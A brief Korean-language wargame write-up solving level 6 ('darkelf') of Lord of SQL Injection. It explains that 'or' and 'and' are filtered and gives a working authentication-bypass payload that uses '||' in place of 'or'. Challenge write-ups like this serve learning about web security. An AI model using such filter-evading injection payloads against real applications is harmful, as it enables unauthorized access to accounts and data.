[Load of SQL Injection] 6번 darkelf

Q6. Darkelf

 

문제

 

풀이과정

코드를 보면 pw는 prob, _, ., () 를 막아놓았으며 or 과 and 도 되지 않는다 따라서 or 과 and 를 우회할 문자를 써서 문제를 풀어보겠다

or	||
and	&&

 

이 문제는 or 만 사용해서 문제를 풀면 된다

?pw=' || id='admin'%23

 

 

문제 해결 화면